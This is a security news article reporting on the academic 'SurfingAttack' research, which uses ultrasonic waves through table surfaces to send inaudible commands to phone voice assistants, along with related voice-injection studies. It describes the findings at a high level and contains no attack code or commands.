Hackers Can Use Ultrasonic Waves to Secretly Control Voice Assistant Devices

hacking voice assistants using ultrasonic waveshacking voice assistants using ultrasonic waves

Researchers have discovered a new means to target
voice-controlled devices by propagating ultrasonic waves through
solid materials in order to interact with and compromise them using
inaudible voice commands without the victims’ knowledge.

Called “SurfingAttack[1],” the attack leverages
the unique properties of acoustic transmission in solid materials —
such as tables — to “enable multiple rounds of interactions between
the voice-controlled device and the attacker over a longer distance
and without the need to be in line-of-sight.”

In doing so, it’s possible for an attacker to interact with the
devices using the voice assistants, hijack SMS two-factor
authentication codes, and even place fraudulent calls, the
researchers outlined in the paper, thus controlling the victim
device inconspicuously.

The research was published by a group of academics from Michigan
State University, Washington University in St. Louis, Chinese
Academy of Sciences, and the University of
Nebraska-Lincoin.

The results were presented at the Network Distributed System
Security Symposium (NDSS) on February 24 in San Diego.

How Does the SurfingAttack Work?

MEMS
microphones
, which are a standard in most voice assistant
controlled devices, contain a small, built-in plate called the
diaphragm, which when hit with sound or light waves, is translated
into an electrical signal that is then decoded into the actual
commands.
The novel attack exploits the nonlinear nature of
MEMS microphone circuits to transmit malicious ultrasonic signals
high-frequency sound waves that are inaudible to the human ear —
using a $5 piezoelectric transducer that’s attached to a table
surface. What’s more, the attacks can be executed from as far as 30
feet.

To conceal the attack from the victim, the researchers then
issued a guided ultrasonic wave to adjust the volume of the device
low enough to make the voice responses unnoticeable, while still be
able to record the voice responses from the assistant via a hidden
tapping device closer to the victim’s device underneath the
table.

Once set up, an interloper can not only activate the voice
assistants (e.g., using “OK Google” or “Hey Siri” as wake words),
but also generate attack commands (e.g. “read my messages,” or
“call Sam with speakerphone”) using text-to-speech (TTS) systems —
all of which are transmitted in the form of ultrasonic guided wave
signals that can propagate along the table to control the
devices.

SurfingAttack was tested with a variety of devices that use voice
assistants, including Google Pixel, Apple iPhone, and Samsung
Galaxy S9, and Xiaomi Mi 8, and were found to be vulnerable to
ultrasonic wave attacks. It was also found to work despite using
different table surfaces (e.g., metal, glass, wood) and phone
configurations.

The experiments, however, come with two failure cases, including
Huawei Mate 9 and Samsung Galaxy Note 10+, the former of which
becomes vulnerable upon installing LineageOS. Observing that the
recorded sounds of the ultrasound commands from Galaxy Note 10+
were very weak, the researchers attributed the failure “to the
structures and materials of the phone body.”

In what’s a big consolation, smart speakers from Amazon and
Google — Amazon Echo and Google Home — were not found to be
impacted by this attack.

Voice-based Attacks on the Rise

While there are no indications so far that it has been maliciously
exploited in the wild, this is not the first time injection attacks
of this kind have been uncovered.

Indeed, the research builds upon a recent string of studies —
BackDoor,
LipRead, and DolphinAttack — that
shows it’s possible to exploit the nonlinearity in microphones to
deliver inaudible commands to the system via ultrasound
signals.
[5][6][7][8]

Furthermore, a study by researchers from Tokyo-based University of
Electro-Communications and the University of Michigan found
late-year a series of attacks — called Light Commands
— that employed lasers to inject inaudible commands into
smartphones and speakers, and surreptitiously cause them to unlock
doors, shop on e-commerce websites, and even start vehicles.

While this attack required the laser beam to be in direct line
of sight to the target device in question, SurfingAttack’s unique
propagation capabilities eliminate this need, thereby allowing a
potential attacker to remotely interact with a voice-activated
device and execute unauthorized commands to access sensitive
information without the victim’s knowledge.

If anything, the latest research presents a new attack vector
that would require device makers to erect new security defenses and
safeguard devices from voice-based attacks that are increasingly
becoming an entry point for everything smart home.

[2][3][4][9]

References

  1. ^
    SurfingAttack
    (surfingattack.github.io)
  2. ^
    MEMS microphones
    (www.edn.com)
  3. ^
    nonlinear nature
    (arxiv.org)
  4. ^
    malicious ultrasonic signals
    (surfingattack.github.io)
  5. ^
    BackDoor
    (synrg.csl.illinois.edu)
  6. ^
    LipRead
    (synrg.csl.illinois.edu)
  7. ^
    DolphinAttack
    (acmccs.github.io)
  8. ^
    microphones
    (arxiv.org)
  9. ^
    Light Commands
    (thehackernews.com)

Read more

Leave a Reply